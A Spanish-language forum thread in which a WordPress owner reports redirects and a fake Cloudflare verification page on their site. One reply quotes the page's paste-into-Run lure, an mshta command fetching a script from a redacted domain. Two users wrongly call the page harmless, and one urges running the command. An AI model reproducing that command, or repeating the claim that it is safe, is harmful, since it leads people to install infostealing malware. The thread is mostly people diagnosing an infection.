Malware en mi sitio web? lo hackearon?

  • Autor Autor zitmit
  • Fecha de inicio Fecha de inicio
zitmit

zitmit

Épsilon
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
Hola recien visitaba mi sitio web y me di cuenta que al entrar despues redirigia a Google.com desactive todos los plugins y al parecer dejó de hacerlo, pero despúes de entrar a 2 o 3 paginas me ingresa esta siguiente pantalla que creo es FAKE.

1743649262263.webp


creo que también redirecciona a este sitio brl.ajax.it.com, ya que desde tiktok al abrir mi web me decia que intentaba abrir ese sitio.

Conozco solo lo básico de wordpres y el hosting (estoy en banahosting por cierto), alquien me puede ayudar por favor, no se que debería de hacer.
 
Última edición:
Parece que tu sitio ha sido comprometido. Aquí hay algunos pasos que puedes seguir:

1. Cambia las contraseñas de tu panel de WordPress, FTP y base de datos.
2. Escanea tu sitio con un plugin de seguridad como Wordfence o Sucuri.
3. Revisa los archivos de tu tema y plugins en busca de código malicioso.
4. Actualiza WordPress, temas y plugins a sus versiones más recientes.
5. Consulta con tu proveedor de hosting para informarles sobre el problema y que puedan ayudarte.

Si no te sientes cómodo haciéndolo tú mismo, considera buscar ayuda profesional.
 
Espero tengas un backup del sitio comprometido, limpia el hosting con ayuda del proveedor o si no sabes como hacerlo, contrata los servicios de expertos como @Mega
 
Lo más probable es que te hayan inyectado ese malware, esto quiere decir que en algún formulario por ejemplo introdujeron código

Esto te lo digo para que revises todos los text área e inputs Para esta tarde detectar por dónde te inyectaron el código Y lo podrás corregir para que no te lo vuelvan a hacer, Si es que fue una inyección
 
Ingrese a tu sitio y me muestra lo mismo hasta el punto que no me deja ver otras páginas.

Deberías de hacer algo pronto, porque si tienes AdSense en tu sitio esto te puede afectar.
 
Hola @zitmit estas usando Cloudflare por lo cual al haber posibles ataques a tu web, mostrara un captcha para poder validar que no eres robot. Lo que te muestra ahy no quiere decir que es virus o que tu web a sido infectada.
 
4ngeluxpunk dijo:
Hola @zitmit estas usando Cloudflare por lo cual al haber posibles ataques a tu web, mostrara un captcha para poder validar que no eres robot. Lo que te muestra ahy no quiere decir que es virus o que tu web a sido infectada.
Hacer clic para expandir...
pero está raro el mensaje no? y eso de introducir un código suena a fake
 
zitmit dijo:
pero está raro el mensaje no? y eso de introducir un código suena a fake
Hacer clic para expandir...
No es raro, es normal. Eso es un nivel de seguridad al tener Cloudflare activado. Al ingresar normal puedo manejarme dentro de tu web sin problemas. Ya no me sale para volver a verificar si soy un robot.
 
arney dijo:
debiste de enviar captura completa para ver la url y asi validar
Hacer clic para expandir...
Lo puedes validar ingresando a la web, desplazarte por sus diferentes apartados. Y corroborar que el nivel de seguirdad de Cloudflare es el que muestra el captcha y/o código para que pueda verificar que no son robot.
 
ahi lo que dice es que actividad web irregular en su ip, deberia validar si esta usando proxy o vpn o alterando visitas de alguna manera

solo esta diciendo que valide la ip por medio de cmd, pero para ver si es verdad arriba debe aparecer el dominio igual ejecutando esa codigo cmd solo es un ping no le hacen nada a su pc, hagalo y valida que se le vaya
 
arney dijo:
ahi lo que dice es que actividad web irregular en su ip, deberia validar si esta usando proxy o vpn o alterando visitas de alguna manera

solo esta diciendo que valide la ip por medio de cmd, pero para ver si es verdad arriba debe aparecer el dominio igual ejecutando esa codigo cmd solo es un ping no le hacen nada a su pc, hagalo y valida que se le vaya
Hacer clic para expandir...
Exacto, es lo que se le ha mencionado a @zitmit por lo cual no debe alarmarse que le hallan hackeado la web o algo parecido, solo es una medida de seguridad del mismo Cloudflare.
 
4ngeluxpunk dijo:
No es raro, es normal. Eso es un nivel de seguridad al tener Cloudflare activado. Al ingresar normal puedo manejarme dentro de tu web sin problemas. Ya no me sale para volver a verificar si soy un robot.
Hacer clic para expandir...
arney dijo:
ahi lo que dice es que actividad web irregular en su ip, deberia validar si esta usando proxy o vpn o alterando visitas de alguna manera

solo esta diciendo que valide la ip por medio de cmd, pero para ver si es verdad arriba debe aparecer el dominio igual ejecutando esa codigo cmd solo es un ping no le hacen nada a su pc, hagalo y valida que se le vaya
Hacer clic para expandir...
4ngeluxpunk dijo:
Exacto, es lo que se le ha mencionado a @zitmit por lo cual no debe alarmarse que le hallan hackeado la web o algo parecido, solo es una medida de seguridad del mismo Cloudflare.
Hacer clic para expandir...
Ambos estan equivocados...
El sitio si esta infectado. Esta simulando el tipico desafio captcha de cloudflare (managed challenge).
Lo que estas realmente copiando y pegando con Ejecutar (Win+R) es un script malicioso: mshta http:// dominioeditado.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"
Y miren lo bonito que ve ese dominio alojando el script...:
VT.png


El inocente que siguio los pasos y hizo la ejecucion, se debe haber comido un lindo infostealer y alguno que otro regalito...

* el dominio esta editado por razones obvias...
 
gifer dijo:
Ambos estan equivocados...
El sitio si esta infectado. Esta simulando el tipico desafio captcha de cloudflare (managed challenge).
Lo que estas realmente copiando y pegando con Ejecutar (Win+R) es un script malicioso: mshta http:// dominioeditado.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"
Y miren lo bonito que ve ese dominio alojando el script...:
VT.png


El inocente que siguio los pasos y hizo la ejecucion, se debe haber comido un lindo infostealer y alguno que otro regalito...

* el dominio esta editado por razones obvias...
Hacer clic para expandir...
Entonces estas usando Windows, ya que en Linux no arroja ni una infección, recuerda que esas herramientas que usas no son 100% efectivas.
 
gifer dijo:
Ambos estan equivocados...
El sitio si esta infectado. Esta simulando el tipico desafio captcha de cloudflare (managed challenge).
Lo que estas realmente copiando y pegando con Ejecutar (Win+R) es un script malicioso: mshta http:// dominioeditado.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"
Y miren lo bonito que ve ese dominio alojando el script...:
VT.png


El inocente que siguio los pasos y hizo la ejecucion, se debe haber comido un lindo infostealer y alguno que otro regalito...

* el dominio esta editado por razones obvias...
Hacer clic para expandir...
Incluso analizandolo no muestra lo que publicas:


1743688391059.webp



1743688418161.webp
 
zitmit dijo:
Hola recien visitaba mi sitio web y me di cuenta que al entrar despues redirigia a Google.com desactive todos los plugins y al parecer dejó de hacerlo, pero despúes de entrar a 2 o 3 paginas me ingresa esta siguiente pantalla que creo es FAKE.

Ver el archivo adjunto 1437990

creo que también redirecciona a este sitio brl.ajax.it.com, ya que desde tiktok al abrir mi web me decia que intentaba abrir ese sitio.

Conozco solo lo básico de wordpres y el hosting (estoy en banahosting por cierto), alquien me puede ayudar por favor, no se que debería de hacer.
Hacer clic para expandir...
Recuerda borrar el cache, y en el caso de providers como bana puedes limpiar el folder detrás del public_html llamado "lscache" de esa forma podrás descartar
 
Yo caí hace rato en otro sitio que quería entrar, primero pensé que era normal, porque ni mi bloqueador, ni mi antivirus salto a alertarme, y desde hace dos dias no podia entrar por el cloudflare, hasta resolvi un captcha despues puse un codigo similar pero para terminal, y de repente ajustes o terminal o algo mas pidió mi contraseña, así que opte por reiniciar mi mac, creo que ya valí xd
 
splanding dijo:
Yo caí hace rato en otro sitio que quería entrar, primero pensé que era normal, porque ni mi bloqueador, ni mi antivirus salto a alertarme, y desde hace dos dias no podia entrar por el cloudflare, hasta resolvi un captcha despues puse un codigo similar pero para terminal, y de repente ajustes o terminal o algo mas pidió mi contraseña, así que opte por reiniciar mi mac, creo que ya valí xd
Hacer clic para expandir...
No ahy si estas mal, por que al pedirte contraseña o otros datos personales de seguridad ahy si no debiste de ingresarlo. Trata de cambiar toda la información de seguridad que tengas en tus cuentas alojadas.
 
4ngeluxpunk dijo:
No ahy si estas mal, por que al pedirte contraseña o otros datos personales de seguridad ahy si no debiste de ingresarlo. Trata de cambiar toda la información de seguridad que tengas en tus cuentas alojadas.
Hacer clic para expandir...
No puse la contraseña, ahi me detuve, ya ando cambiando todo jajaja, quiero creer que mi Mac me salvo? Pero por si las dudas, ya ando cambiando todo, en mi defensa, me dormi tratando de ingresar y fue lo primero que hice al despertar con mi lap a un lado xd
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

Naturalista
  • Cerrado
Me ofrezco ¿Hackearon tu sitio web? Lo solucionamos ✅
Respuestas
4
Visitas
249
Naturalista
Naturalista
CesarZela
  • Cerrado
Se solicita Experto para quitar virus o malware de mi sitio web
Respuestas
6
Visitas
309
nerorese
N
M
¡Mi sitio web fue hackeado! Consejos para reforzar seguridad
Respuestas
14
Visitas
1K
CarlosRR
CarlosRR
eruizr82
Alguien se puso como propietario de mi sitio web en SC ¿me hackearon ?
Respuestas
10
Visitas
559
escalante97
escalante97
Jhon de la Vega
¿Mi sitio web fue hackeado? ¡Necesito ayuda urgente!
Respuestas
8
Visitas
545
Jhon de la Vega
Jhon de la Vega
Atrás
Arriba